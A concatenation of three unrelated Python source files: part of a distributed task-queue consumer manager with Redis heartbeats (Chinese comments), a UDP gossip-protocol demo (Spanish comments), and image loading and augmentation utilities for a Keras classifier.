if not {self.consumer._concurrent_mode, ConsumersManager.global_concurrent_mode}.issubset({ConcurrentModeEnum.THREADING,
ConcurrentModeEnum.ASYNC,
ConcurrentModeEnum.SINGLE_THREAD}):
# threding、asyncio、solo 这几种模式可以共存。但同一个解释器不能同时选择 gevent + 其它并发模式,也不能 eventlet + 其它并发模式。
raise ValueError('''由于猴子补丁的原因,同一解释器中不可以设置两种并发类型,请查看显示的所有消费者的信息,
搜索 concurrent_mode 关键字,确保当前解释器内的所有消费者的并发模式只有一种(或可以共存),
asyncio threading single_thread 并发模式可以共存,但gevent和threading不可以共存,
gevent和eventlet不可以共存''')
ConsumersManager.global_concurrent_mode = self.consumer._concurrent_mode
def build_pool(self):
if self.consumer._concurrent_pool is not None:
return self.consumer._concurrent_pool
pool_type = None # 是按照ThreadpoolExecutor写的三个鸭子类,公有方法名和功能写成完全一致,可以互相替换。
if self._concurrent_mode == ConcurrentModeEnum.THREADING:
pool_type = CustomThreadPoolExecutor
# pool_type = BoundedThreadPoolExecutor
elif self._concurrent_mode == ConcurrentModeEnum.GEVENT:
pool_type = GeventPoolExecutor
elif self._concurrent_mode == ConcurrentModeEnum.EVENTLET:
pool_type = CustomEventletPoolExecutor
elif self._concurrent_mode == ConcurrentModeEnum.ASYNC:
pool_type = AsyncPoolExecutor
elif self._concurrent_mode == ConcurrentModeEnum.SINGLE_THREAD:
pool_type = SoloExecutor
# elif self._concurrent_mode == ConcurrentModeEnum.LINUX_FORK:
# pool_type = SimpleProcessPool
# pool_type = BoundedProcessPoolExecutor
# from concurrent.futures import ProcessPoolExecutor
# pool_type = ProcessPoolExecutor
if self._concurrent_mode == ConcurrentModeEnum.ASYNC:
self.consumer._concurrent_pool = self.consumer._specify_concurrent_pool if self.consumer._specify_concurrent_pool is not None else pool_type(
self.consumer._concurrent_num, loop=self.consumer._specify_async_loop)
else:
# print(pool_type)
self.consumer._concurrent_pool = self.consumer._specify_concurrent_pool if self.consumer._specify_concurrent_pool is not None else pool_type(
self.consumer._concurrent_num)
# print(self._concurrent_mode,self.consumer._concurrent_pool)
return self.consumer._concurrent_pool
def schedulal_task_with_no_block(self):
if ConsumersManager.schedual_task_always_use_thread:
t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
ConsumersManager.schedulal_thread_to_be_join.append(t)
t.start()
else:
if self._concurrent_mode in [ConcurrentModeEnum.THREADING, ConcurrentModeEnum.ASYNC,
ConcurrentModeEnum.SINGLE_THREAD, ]:
t = Thread(target=self.consumer.keep_circulating(1)(self.consumer._shedual_task))
ConsumersManager.schedulal_thread_to_be_join.append(t)
t.start()
elif self._concurrent_mode == ConcurrentModeEnum.GEVENT:
g = gevent.spawn(self.consumer.keep_circulating(1)(self.consumer._shedual_task), )
ConsumersManager.schedulal_thread_to_be_join.append(g)
elif self._concurrent_mode == ConcurrentModeEnum.GEVENT:
g = eventlet.spawn(self.consumer.keep_circulating(1)(self.consumer._shedual_task), )
ConsumersManager.schedulal_thread_to_be_join.append(g)
def wait_for_possible_has_finish_all_tasks_by_conusmer_list(consumer_list: typing.List[AbstractConsumer], minutes: int = 3):
"""
判断多个消费者是否消费完成了。
由于是异步消费,和存在队列一边被消费,一边在推送,或者还有结尾少量任务还在确认消费者实际还没彻底运行完成。 但有时候需要判断 所有任务,务是否完成,提供一个不精确的判断,要搞清楚原因和场景后再慎用。
一般是和celery一样,是永久运行的后台任务,永远无限死循环去任务执行任务,但有的人有判断是否执行完成的需求。
:param consumer_list: 多个消费者列表
:param minutes: 消费者连续多少分钟没执行任务任务 并且 消息队列中间件中没有,就判断为消费完成。为了防止是长耗时任务,一般判断完成是真正提供的minutes的2个周期时间。
:return:
"""
with BoundedThreadPoolExecutor(len(consumer_list)) as pool:
for consumer in consumer_list:
pool.submit(consumer.wait_for_possible_has_finish_all_tasks(minutes))
class DistributedConsumerStatistics(RedisMixin, LoggerMixinDefaultWithFileHandler):
"""
为了兼容模拟mq的中间件(例如redis,他没有实现amqp协议,redis的list结构和真mq差远了),获取一个队列有几个连接活跃消费者数量。
分布式环境中的消费者统计。主要目的有3点
1、统计活跃消费者数量用于分布式控频。
获取分布式的消费者数量后,用于分布式qps控频。如果不获取全环境中的消费者数量,则只能用于当前进程中的消费控频。
即使只有一台机器,例如把xx.py启动3次,xx.py的consumer设置qps为10,如果不使用分布式控频,会1秒钟最终运行30次函数而不是10次。
2、记录分布式环境中的活跃消费者的所有消费者 id,如果消费者id不在此里面说明已掉线或关闭,消息可以重新分发,用于不支持服务端天然消费确认的中间件。
3、从redis中获取停止和暂停状态,以便支持在别的地方发送命令停止或者暂停消费。
"""
def __init__(self, consumer: AbstractConsumer):
# self._consumer_identification = consumer_identification
# self._consumer_identification_map = consumer_identification_map
# self._queue_name = queue_name
self._consumer_identification = consumer.consumer_identification
self._consumer_identification_map = consumer.consumer_identification_map
self._queue_name = consumer.queue_name
self._consumer = consumer
self._redis_key_name = f'funboost_hearbeat_queue__str:{self._queue_name}'
self.active_consumer_num = 1
self._last_show_consumer_num_timestamp = 0
self._queue__consumer_identification_map_key_name = f'funboost_hearbeat_queue__dict:{self._queue_name}'
self._server__consumer_identification_map_key_name = f'funboost_hearbeat_server__dict:{nb_log_config_default.computer_ip}'
def run(self):
self.send_heartbeat()
self._consumer.keep_circulating(10, block=False)(self.send_heartbeat)()
# decorators.keep_circulating(5, block=False)(self._show_active_consumer_num)() # 主要是为快速频繁统计分布式消费者个数,快速调整分布式qps控频率。
def _send_heartbeat_with_dict_value(self, redis_key, ):
# 发送当前消费者进程心跳的,值是字典,按一个机器或者一个队列运行了哪些进程。
results = self.redis_db_frame.smembers(redis_key)
with self.redis_db_frame.pipeline() as p:
for result in results:
result_dict = json.loads(result)
if self.timestamp() - result_dict['hearbeat_timestamp'] > 15 \
or self._consumer_identification_map['consumer_uuid'] == result_dict['consumer_uuid']:
# 因为这个是10秒钟运行一次,15秒还没更新,那肯定是掉线了。如果消费者本身是自己也先删除。
p.srem(redis_key, result)
self._consumer_identification_map['hearbeat_datetime_str'] = time_util.DatetimeConverter().datetime_str
self._consumer_identification_map['hearbeat_timestamp'] = self.timestamp()
value = json.dumps(self._consumer_identification_map, sort_keys=True)
p.sadd(redis_key, value)
p.execute()
def send_heartbeat(self):
# 根据队列名心跳的,值是字符串,方便值作为其他redis的键名
results = self.redis_db_frame.smembers(self._redis_key_name)
with self.redis_db_frame.pipeline() as p:
for result in results:
if self.timestamp() - float(result.decode().split('&&')[-1]) > 15 or \
self._consumer_identification == result.decode().split('&&')[0]: # 因为这个是10秒钟运行一次,15秒还没更新,那肯定是掉线了。如果消费者本身是自己也先删除。
p.srem(self._redis_key_name, result)
p.sadd(self._redis_key_name, f'{self._consumer_identification}&&{self.timestamp()}')
p.execute()
self._send_heartbeat_with_dict_value(self._queue__consumer_identification_map_key_name)
self._send_heartbeat_with_dict_value(self._server__consumer_identification_map_key_name)
self._show_active_consumer_num()
self._get_stop_and_pause_flag_from_redis()
def _show_active_consumer_num(self):
self.active_consumer_num = self.redis_db_frame.scard(self._redis_key_name) or 1
if time.time() - self._last_show_consumer_num_timestamp > 600:
self.logger.info(f'分布式所有环境中使用 {self._queue_name} 队列的,一共有 {self.active_consumer_num} 个消费者')
self._last_show_consumer_num_timestamp = time.time()
def get_queue_heartbeat_ids(self, without_time: bool):
if without_time:
return [idx.decode().split('&&')[0] for idx in self.redis_db_frame.smembers(self._redis_key_name)]
else:
return [idx.decode() for idx in self.redis_db_frame.smembers(self._redis_key_name)]
# noinspection PyProtectedMember
def _get_stop_and_pause_flag_from_redis(self):
stop_flag = self.redis_db_frame.get(self._consumer._redis_key_stop_flag)
if stop_flag is not None and int(stop_flag) == 1:
self._consumer._stop_flag = 1
else:
self._consumer._stop_flag = 0
pause_flag = self.redis_db_frame.get(self._consumer._redis_key_pause_flag)
if pause_flag is not None and int(pause_flag) == 1:
self._consumer._pause_flag = 1
else:
self._consumer._pause_flag = 0
class ActiveCousumerProcessInfoGetter(RedisMixin, LoggerMixinDefaultWithFileHandler):
"""
获取分布式环境中的消费进程信息。
使用这里面的4个方法需要相应函数的@boost装饰器设置 is_send_consumer_hearbeat_to_redis=True,这样会自动发送活跃心跳到redis。否则查询不到该函数的消费者进程信息。
要想使用消费者进程信息统计功能,用户无论使用何种消息队列中间件类型,用户都必须安装redis,并在 funboost_config.py 中配置好redis链接信息
"""
def _get_all_hearbeat_info_by_redis_key_name(self, redis_key):
results = self.redis_db_frame.smembers(redis_key)
# print(type(results))
# print(results)
# 如果所有机器所有进程都全部关掉了,就没办法还剩一个线程执行删除了,这里还需要判断一次15秒。
active_consumers_processor_info_list = []
for result in results:
result_dict = json.loads(result)
if self.timestamp() - result_dict['hearbeat_timestamp'] < 15:
active_consumers_processor_info_list.append(result_dict)
return active_consumers_processor_info_list
def get_all_hearbeat_info_by_queue_name(self, queue_name) -> typing.List[typing.Dict]:
"""
根据队列名查询有哪些活跃的消费者进程
返回结果例子:
[{
"code_filename": "/codes/funboost/test_frame/my/test_consume.py",
"computer_ip": "172.16.0.9",
"computer_name": "VM_0_9_centos",
"consumer_id": 140477437684048,
"consumer_uuid": "79473629-b417-4115-b516-4365b3cdf383",
"consuming_function": "f2",
"hearbeat_datetime_str": "2021-12-27 19:22:04",
"hearbeat_timestamp": 1640604124.4643965,
"process_id": 9665,
"queue_name": "test_queue72c",
"start_datetime_str": "2021-12-27 19:21:24",
"start_timestamp": 1640604084.0780013
}, ...............]
"""
redis_key = f'funboost_hearbeat_queue__dict:{queue_name}'
return self._get_all_hearbeat_info_by_redis_key_name(redis_key)
def get_all_hearbeat_info_by_ip(self, ip=None) -> typing.List[typing.Dict]:
"""
根据机器的ip查询有哪些活跃的消费者进程,ip不传参就查本机ip使用funboost框架运行了哪些消费进程,传参则查询任意机器的消费者进程信息。
返回结果的格式和上面的 get_all_hearbeat_dict_by_queue_name 方法相同。
"""
ip = ip or nb_log_config_default.computer_ip
redis_key = f'funboost_hearbeat_server__dict:{ip}'
return self._get_all_hearbeat_info_by_redis_key_name(redis_key)
def _get_all_hearbeat_info_partition_by_redis_key_prefix(self, redis_key_prefix):
keys = self.redis_db_frame.scan(0, f'{redis_key_prefix}*', 10000)[1]
infos_map = {}
for key in keys:
key = key.decode()
infos = self.redis_db_frame.smembers(key)
dict_key = key.replace(redis_key_prefix, '')
infos_map[dict_key] = []
for info_str in infos:
info_dict = json.loads(info_str)
if self.timestamp() - info_dict['hearbeat_timestamp'] < 15:
infos_map[dict_key].append(info_dict)
return infos_map
def get_all_hearbeat_info_partition_by_queue_name(self) -> typing.Dict[typing.AnyStr, typing.List[typing.Dict]]:
"""获取所有队列对应的活跃消费者进程信息,按队列名划分,不需要传入队列名,自动扫描redis键。请不要在 funboost_config.py 的redis 指定的db中放太多其他业务的缓存键值对"""
infos_map = self._get_all_hearbeat_info_partition_by_redis_key_prefix('funboost_hearbeat_queue__dict:')
self.logger.info(f'获取所有队列对应的活跃消费者进程信息,按队列名划分,结果是 {json.dumps(infos_map, indent=4)}')
return infos_map
def get_all_hearbeat_info_partition_by_ip(self) -> typing.Dict[typing.AnyStr, typing.List[typing.Dict]]:
"""获取所有机器ip对应的活跃消费者进程信息,按机器ip划分,不需要传入机器ip,自动扫描redis键。请不要在 funboost_config.py 的redis 指定的db中放太多其他业务的缓存键值对 """
infos_map = self._get_all_hearbeat_info_partition_by_redis_key_prefix('funboost_hearbeat_server__dict:')
self.logger.info(f'获取所有机器ip对应的活跃消费者进程信息,按机器ip划分,结果是 {json.dumps(infos_map, indent=4)}')
return infos_map
|
gossip.py
|
import sys
import time
import socket
import threading
class Gossip:
infected_nodes = set()
def __init__(self, host:str, port:int, connected_nodes:set):
'''
Inicializa las variables a utilizar e inicia los hilos.
Espera el host, el puerto y los puertos conectados a el.
'''
self.hostname = host
self.port = port
self.connected_nodes = connected_nodes
self.susceptible_nodes = connected_nodes
# usamos SOCK_DGRAM para poder enviar datos sin una conexion (UDP)
self.node = socket.socket(type=socket.SOCK_DGRAM)
# asigna la direccion y puerto del servidor
self.node.bind((self.hostname, self.port))
print(f'Empieza un nodo en el puerto {self.port}')
print(f'Nodos susceptibles => {self.susceptible_nodes if len(self.susceptible_nodes) != 0 else {}}\n')
# inicia los hilos de escribir y enviar los mensajes
self.start_threads()
def input_message(self):
'''
Escribe los mensajes para ser enviados.
'''
while True:
# actualizamos la lista de nodos susceptibles
self.susceptible_nodes = self.connected_nodes.copy()
print('Escriba un mensaje:')
message_to_send = input()
if message_to_send != 'exit':
self.transmit_message(message_to_send.encode('ascii'))
else:
self.node.close()
sys.exit()
def receive_message(self):
'''
Recibimos los mensajes.
'''
while True:
# actualizamos la lista de nodos susceptibles
self.susceptible_nodes = self.connected_nodes.copy()
# usamos 'recvfrom' para recibir los mensajes
# estamos usando un protocolo sin conexion (UDP)
message_to_forward, address = self.node.recvfrom(1024)
self.susceptible_nodes.discard(address[1])
Gossip.infected_nodes.add(address[1])
time.sleep(2)
print(f'\nMensaje: "{message_to_forward.decode("ascii")}"')
print(f'Recibido el {time.ctime(time.time())} por el puerto [{address[1]}]\n')
self.transmit_message(message_to_forward)
def transmit_message(self, message:str):
'''
Enviamos los mensajes a los restantes
nodos susceptibles.
'''
while len(self.susceptible_nodes) != 0:
selected_port = self.susceptible_nodes.pop()
print('-' * 50)
print(f'Nodos susceptibles => {self.susceptible_nodes if len(self.susceptible_nodes) != 0 else {}}')
print(f'Nodos infectados => {Gossip.infected_nodes if len(Gossip.infected_nodes) != 0 else {}}')
print(f'Puerto seleccionado => [{selected_port}]')
# usamos 'sendto' para transmitir los mensajes
# estamos usando un protocolo sin conexion (UDP)
self.node.sendto(message, (self.hostname, selected_port))
self.susceptible_nodes.discard(selected_port)
Gossip.infected_nodes.add(selected_port)
print(f'Mensaje: "{message.decode("ascii")}" enviado a [{selected_port}]')
print(f'Nodos susceptibles => {self.susceptible_nodes if len(self.susceptible_nodes) != 0 else {}}')
print(f'Nodos infectados => {Gossip.infected_nodes if len(Gossip.infected_nodes) != 0 else {}}')
print('-' * 50)
time.sleep(2)
def start_threads(self):
'''
Permite que cada nodo pueda ingresar un
mensaje y aun pueda recibir otro mensaje.
'''
input_msg_thread = threading.Thread(target=self.input_message)
receive_msg_thread = threading.Thread(target=self.receive_message)
input_msg_thread.daemon = True
input_msg_thread.start()
receive_msg_thread.daemon = True
receive_msg_thread.start()
input_msg_thread.join()
receive_msg_thread.join()
|
data_utils.py
|
"""
Miscellaneous functions manage data.
Date: September 2018
Author: Ignacio Heredia
Email: iheredia@ifca.unican.es
Github: ignacioheredia
"""
import os
import threading
from multiprocessing import Pool
import queue
import subprocess
import warnings
import base64
import numpy as np
import requests
from tqdm import tqdm
from tensorflow.keras.utils import to_categorical, Sequence
import cv2
import albumentations
from albumentations.augmentations import transforms
from albumentations.imgaug import transforms as imgaug_transforms
def load_data_splits(splits_dir, im_dir,use_location, split_name='train'):
"""
Load the data arrays from the [train/val/test].txt files.
Lines of txt files have the following format:
'relative_path_to_image' 'image_label_number' 'image_location_label_number'
Parameters
----------
im_dir : str
Absolute path to the image folder.
split_name : str
Name of the data split to load
use_location : boolean
to work properly with or without location data
Returns
-------
X : Numpy array of strs
First colunm: Contains 'absolute_path_to_file' to images.
y : Numpy array of int32
Image label number
"""
if use_location :
print("con location")
#Usual workflow with extra stuff in order to return location labels properly
if '{}.txt'.format(split_name) not in os.listdir(splits_dir):
raise ValueError("Invalid value for the split_name parameter: there is no `{}.txt` file in the `{}` "
"directory.".format(split_name, splits_dir))
# Loading splits
print("Loading {} data...".format(split_name))
split = np.genfromtxt(os.path.join(splits_dir, '{}.txt'.format(split_name)), dtype='str', delimiter=' ')
X = np.array([os.path.join(im_dir, i) for i in split[:, 0]])
#TODO Check this part of the code
if len(split.shape) == 2:
y = split[:, 1].astype(np.int32)
location = split[:, 2].astype(np.int32)
else: # maybe test file has not labels
y = None
return X, y, location
else:
print("sin location")
#If no location data, the workflow resumes as usual
if '{}.txt'.format(split_name) not in os.listdir(splits_dir):
raise ValueError("Invalid value for the split_name parameter: there is no `{}.txt` file in the `{}` "
"directory.".format(split_name, splits_dir))
# Loading splits
print("Loading {} data...".format(split_name))
split = np.genfromtxt(os.path.join(splits_dir, '{}.txt'.format(split_name)), dtype='str', delimiter=' ')
X = np.array([os.path.join(im_dir, i) for i in split[:, 0]])
#TODO Check this part of the code
if len(split.shape) == 2:
y = split[:, 1].astype(np.int32)
else: # maybe test file has not labels
y = None
return X, y
def mount_nextcloud(frompath, topath):
"""
Mount a NextCloud folder in your local machine or viceversa.
"""
command = (['rclone', 'copy', frompath, topath])
result = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output, error = result.communicate()
if error:
warnings.warn("Error while mounting NextCloud: {}".format(error))
return output, error
def load_class_names(splits_dir):
"""
Load list of class names
Returns
-------
Numpy array of shape (N) containing strs with class names
"""
print("Loading class names...")
class_names = np.genfromtxt(os.path.join(splits_dir, 'classes.txt'), dtype='str', delimiter='/n')
return class_names
def load_location_names(splits_dir):
"""
Load list of class names
Returns
-------
Numpy array of shape (N) containing strs with class names
"""
print("Loading location names...")
location_names = np.genfromtxt(os.path.join(splits_dir, 'locations.txt'), dtype='str', delimiter='/n')
return location_names
def load_class_info(splits_dir):
"""
Load list of class names
Returns
-------
Numpy array of shape (N) containing strs with class names
"""
print("Loading class info...")
class_info = np.genfromtxt(os.path.join(splits_dir, 'info.txt'), dtype='str', delimiter='/n')
return class_info
def load_image(filename, filemode='local'):
"""
Function to load a local image path (or an url) into a numpy array.
Parameters
----------
filename : str
Path or url to the image
filemode : {'local','url'}
- 'local': filename is absolute path in local disk.
- 'url': filename is internet url.
Returns
-------
A numpy array
"""
if filemode == 'local':
image = cv2.imread(filename, cv2.IMREAD_COLOR)
if image is None:
raise ValueError('The local path does not exist or does not correspond to an image: \n {}'.format(filename))
elif filemode == 'url':
try:
if filename.startswith('data:image'): # base64 encoded string
data = base64.b64decode(filename.split(';base64,')[1])
else: # normal url
data = requests.get(filename).content
data = np.frombuffer(data, np.uint8)
image = cv2.imdecode(data, cv2.IMREAD_COLOR)
if image is None:
raise Exception
except:
raise ValueError('Incorrect url path: \n {}'.format(filename))
else:
raise ValueError('Invalid value for filemode.')
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) # change from default BGR OpenCV format to Python's RGB format
return image
def preprocess_batch(batch, mean_RGB, std_RGB, mode='tf', channels_first=False):
"""
Standardize batch to feed the net. Adapted from [1] to take replace the default imagenet mean and std.
[1] https://github.com/keras-team/keras-applications/blob/master/keras_applications/imagenet_utils.py
Parameters
----------
batch : list of numpy arrays
mean_RGB, std_RGB : list of floats, len=3
Mean/std RGB values for your dataset.
channels_first : bool
Use batch of shape (N, C, H, W) instead of (N, H, W, C)
Returns
-------
Numpy array
"""
assert type(batch) is list, "Your batch must be a list of numpy arrays"
mean_RGB, std_RGB = np.array(mean_RGB), np.array(std_RGB)
batch = np.array(batch) - mean_RGB[None, None, None, :] # mean centering
if mode == 'caffe':
batch = batch[:, :, :, ::-1] # switch from RGB to BGR
if mode == 'tf':
batch /= 127.5 # scaling between [1, -1]
if mode == 'torch':
batch /= std_RGB
if channels_first:
batch = batch.transpose(0, 3, 1, 2) # shape(N, 3, 224, 224)
return batch.astype(np.float32)
def augment(im, params=None):
"""
Perform data augmentation on some image using the albumentations package.
Parameters
----------
im : Numpy array
params : dict or None
Contains the data augmentation parameters
Mandatory keys:
- h_flip ([0,1] float): probability of performing an horizontal left-right mirroring.
- v_flip ([0,1] float): probability of performing an vertical up-down mirroring.
- rot ([0,1] float): probability of performing a rotation to the image.
- rot_lim (int): max degrees of rotation.
- stretch ([0,1] float): probability of randomly stretching an image.
- crop ([0,1] float): randomly take an image crop.
- zoom ([0,1] float): random zoom applied to crop_size.
--> Therefore the effective crop size at each iteration will be a
random number between 1 and crop*(1-zoom). For example:
* crop=1, zoom=0: no crop of the image
* crop=1, zoom=0.1: random crop of random size between 100% image and 90% of the image
* crop=0.9, zoom=0.1: random crop of random size between 90% image and 80% of the image
* crop=0.9, zoom=0: random crop of always 90% of the image
Image size refers to the size of the shortest side.
- blur ([0,1] float): probability of randomly blurring an image.
- pixel_noise ([0,1] float): probability of randomly adding pixel noise to an image.
- pixel_sat ([0,1] float): probability of randomly using HueSaturationValue in the image.
- cutout ([0,1] float): probability of using cutout in the image.
Returns
-------
Numpy array
"""
## 1) Crop the image
effective_zoom = np.random.rand() * params['zoom']
crop = params['crop'] - effective_zoom
ly, lx, channels = im.shape
crop_size = int(crop * min([ly, lx]))
rand_x = np.random.randint(low=0, high=lx - crop_size + 1)
rand_y = np.random.randint(low=0, high=ly - crop_size + 1)
crop = transforms.Crop(x_min=rand_x,
y_min=rand_y,
x_max=rand_x + crop_size,
y_max=rand_y + crop_size)
im = crop(image=im)['image']
## 2) Now add the transformations for augmenting the image pixels
transform_list = []
# Add random stretching
if params['stretch']:
transform_list.append(
imgaug_transforms.IAAPerspective(scale=0.1, p=params['stretch'])
)
# Add random rotation
if params['rot']:
transform_list.append(
transforms.Rotate(limit=params['rot_lim'], p=params['rot'])
)
# Add horizontal flip
if params['h_flip']:
transform_list.append(
transforms.HorizontalFlip(p=params['h_flip'])
)
# Add vertical flip
if params['v_flip']:
transform_list.append(
transforms.VerticalFlip(p=params['v_flip'])
)
# Add some blur to the image
if params['blur']:
transform_list.append(
albumentations.OneOf([
transforms.MotionBlur(blur_limit=7, p=1.),
transforms.MedianBlur(blur_limit=7, p=1.),
transforms.Blur(blur_limit=7, p=1.),
], p=params['blur'])
)
# Add pixel noise
if params['pixel_noise']:
transform_list.append(
albumentations.OneOf([
transforms.CLAHE(clip_limit=2, p=1.),
imgaug_transforms.IAASharpen(p=1.),
imgaug_transforms.IAAEmboss(p=1.),
transforms.RandomBrightnessContrast(contrast_limit=0, p=1.),
transforms.RandomBrightnessContrast(brightness_limit=0, p=1.),
transforms.RGBShift(p=1.),
transforms.RandomGamma(p=1.)#,
# transforms.JpegCompression(),
# transforms.ChannelShuffle(),
# transforms.ToGray()
], p=params['pixel_noise'])
)
# Add pixel saturation
if params['pixel_sat']:
transform_list.append(
transforms.HueSaturationValue(p=params['pixel_sat'])
)
# Remove randomly remove some regions from the image
if params['cutout']:
ly, lx, channels = im.shape
scale_low, scale_high = 0.05, 0.25 # min and max size of the squares wrt the full image
scale = np.random.uniform(scale_low, scale_high)
transform_list.append(
transforms.Cutout(num_holes=8, max_h_size=int(scale*ly), max_w_size=int(scale*lx), p=params['cutout'])
)
# Compose all image transformations and augment the image
augmentation_fn = albumentations.Compose(transform_list)
im = augmentation_fn(image=im)['image']
return im
def resize_im(im, height, width):
resize_fn = transforms.Resize(height=height, width=width)
return resize_fn(image=im)['image']
def data_generator(inputs, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes,
im_size=224, shuffle=True):
"""
Generator to feed Keras fit function
Parameters
----------
inputs : Numpy array, shape (N, H, W, C)
targets : Numpy array, shape (N)
batch_size : int
shuffle : bool
aug_params : dict
im_size : int
Final image size to feed the net's input (eg. 224 for Resnet).
Returns
-------
Generator of inputs and labels
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batch_size
# Create list of indices
idxs = np.arange(len(inputs))
if shuffle:
np.random.shuffle(idxs)
# # Reshape targets to the correct shape
# if len(targets.shape) == 1:
# print('reshaping targets')
# targets = targets.reshape(-1, 1)
for start_idx in range(0, len(inputs) - batch_size + 1, batch_size):
excerpt = idxs[start_idx:start_idx + batch_size]
batch_X = []
for i in excerpt:
im = load_image(inputs[i], filemode='local')
im = augment(im, params=aug_params)
im = resize_im(im, height=im_size, width=im_size)
batch_X.append(im) # shape (N, 224, 224, 3)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=mean_RGB, std_RGB=std_RGB, mode=preprocess_mode)
batch_y = to_categorical(targets[excerpt], num_classes=num_classes)
yield batch_X, batch_y
def buffered_generator(source_gen, buffer_size=10):
"""
Generator that runs a slow source generator in a separate thread. Beware of the GIL!
Author: Benanne (github-kaggle/benanne/ndsb)
Parameters
----------
source_gen : generator
buffer_size: the maximal number of items to pre-generate (length of the buffer)
Returns
-------
Buffered generator
"""
if buffer_size < 2:
raise RuntimeError("Minimal buffer size is 2!")
buffer = queue.Queue(maxsize=buffer_size - 1)
# the effective buffer size is one less, because the generation process
# will generate one extra element and block until there is room in the buffer.
def _buffered_generation_thread(source_gen, buffer):
for data in source_gen:
buffer.put(data, block=True)
buffer.put(None) # sentinel: signal the end of the iterator
thread = threading.Thread(target=_buffered_generation_thread, args=(source_gen, buffer))
thread.daemon = True
thread.start()
for data in iter(buffer.get, None):
yield data
class data_sequence(Sequence):
"""
Instance of a Keras Sequence that is safer to use with multiprocessing than a standard generator.
Check https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly
TODO: Add sample weights on request
"""
def __init__(self, inputs, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes,
im_size=224, shuffle=True):
"""
Parameters are the same as in the data_generator function
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batch_size
self.inputs = inputs
self.targets = targets
self.batch_size = batch_size
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.num_classes = num_classes
self.im_size = im_size
self.shuffle = shuffle
self.on_epoch_end()
def __len__(self):
return int(np.ceil(len(self.inputs) / float(self.batch_size)))
def __getitem__(self, idx):
batch_idxs = self.indexes[idx*self.batch_size: (idx+1)*self.batch_size]
batch_X = []
for i in batch_idxs:
im = load_image(self.inputs[i])
if self.aug_params:
im = augment(im, params=self.aug_params)
im = resize_im(im, height=self.im_size, width=self.im_size)
batch_X.append(im) # shape (N, 224, 224, 3)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
batch_y = to_categorical(self.targets[batch_idxs], num_classes=self.num_classes)
return batch_X, batch_y
def on_epoch_end(self):
"""Updates indexes after each epoch"""
self.indexes = np.arange(len(self.inputs))
if self.shuffle:
np.random.shuffle(self.indexes)
class data_sequence_lo(Sequence):
"""
Modificacion de data_sequence que soporta el uso de localizaciones y se las pasa a la red. Instance of a Keras Sequence that is safer to use with multiprocessing than a standard generator.
Check https://stanford.edu/~shervine/blog/keras-how-to-generate-data-on-the-fly
TODO: Add sample weights on request
"""
def __init__(self, inputs, locations, targets, batch_size, mean_RGB, std_RGB, preprocess_mode, aug_params, num_classes, num_locations,
im_size=224, shuffle=True):
"""
Mismo parámetros de data sequence salvo por el añadido de la lista de localizaciones y un int32
con el número de localizaciones distintas. Parameters are the same as in the data_generator function
"""
assert len(inputs) == len(targets)
assert len(inputs) >= batch_size
self.inputs = inputs
self.locations = locations
self.targets = targets
self.batch_size = batch_size
self.mean_RGB = mean_RGB
self.std_RGB = std_RGB
self.preprocess_mode = preprocess_mode
self.aug_params = aug_params
self.num_classes = num_classes
self.num_locations = num_locations
self.im_size = im_size
self.shuffle = shuffle
self.on_epoch_end()
def __len__(self):
return int(np.ceil(len(self.inputs) / float(self.batch_size)))
def __getitem__(self, idx):
batch_idxs = self.indexes[idx*self.batch_size: (idx+1)*self.batch_size]
batch_X = []
for i in batch_idxs:
im = load_image(self.inputs[i])
if self.aug_params:
im = augment(im, params=self.aug_params)
im = resize_im(im, height=self.im_size, width=self.im_size)
batch_X.append(im) # shape (N, 224, 224, 3)
batch_X = preprocess_batch(batch=batch_X, mean_RGB=self.mean_RGB, std_RGB=self.std_RGB, mode=self.preprocess_mode)
batch_y = to_categorical(self.targets[batch_idxs], num_classes=self.num_classes)
batch_locations = to_categorical(self.locations[batch_idxs], num_classes=self.num_locations)
return [batch_X,batch_locations], batch_y
def on_epoch_end(self):
"""Updates indexes after each epoch"""
self.indexes = np.arange(len(self.inputs))
if self.shuffle:
np.random.shuffle(self.indexes)
def standard_tencrop_batch(im, crop_prop=0.9):
"""
Returns an ordered ten crop batch of images from an original image (corners, center + mirrors).
Parameters
----------
im : numpy array, type np.uint8
crop_prop: float, [0, 1]
Size of the crop with respect to the whole image
Returns
-------
List of 10 numpy arrays
"""
batch = []
min_side = np.amin(im.shape[:2])
im = resize_im(im, height=min_side, width=min_side) # resize to shorter border
h, w = min_side, min_side # height, width (square)
crop_size = int(crop_prop * min_side)
# Crops
c1 = transforms.Crop(x_min=0,
y_min=0,
x_max=crop_size,
y_max=crop_size)(image=im)['image'] # top-left
c2 = transforms.Crop(x_min=0,
y_min=h-crop_size,
x_max=crop_size,
y_max=h)(image=im)['image'] # bottom-left
c3 = transforms.Crop(x_min=w-crop_size,
y_min=0,
x_max=w,
y_max=crop_size)(image=im)['image'] # top-right
c4 = transforms.Crop(x_min=w-crop_size,
y_min=h-crop_size,
x_max=w,
y_max=h)(image=im)['image'] # bottom-right
c5 = transforms.Crop(x_min=np.round((w-crop_size)/2).astype(int),
y_min=np.round((h-crop_size)/2).astype(int),
x_max=np.round((w+crop_size)/2).astype(int),
y_max=np.round((h+crop_size)/2).astype(int))(image=im)['image'] # center
# Save crop and its mirror
lr_aug = albumentations.HorizontalFlip(p=1)
for image in [c1, c2, c3, c4, c5]:
batch.append(image)
batch.append(lr_aug(image=image)['image'])
return batch
class k_crop_data_sequence(Sequence):
"""
Data sequence generator for test time to feed to predict_generator.
Each batch delivered is composed by multiple crops (default=10) of the same image.
"""
def __init__(self, inputs, mean_RGB, std_RGB, preprocess_mode, aug_params, crop_number=10, crop_mode='random',
filemode='local', im_size=224):
"""
Parameters are the same as in the data_generator function except for:
Parameters
----------
crop_number : int
Number of crops of each image to take.
mode :str, {'random', 'standard'}
If 'random' data augmentation is performed randomly.
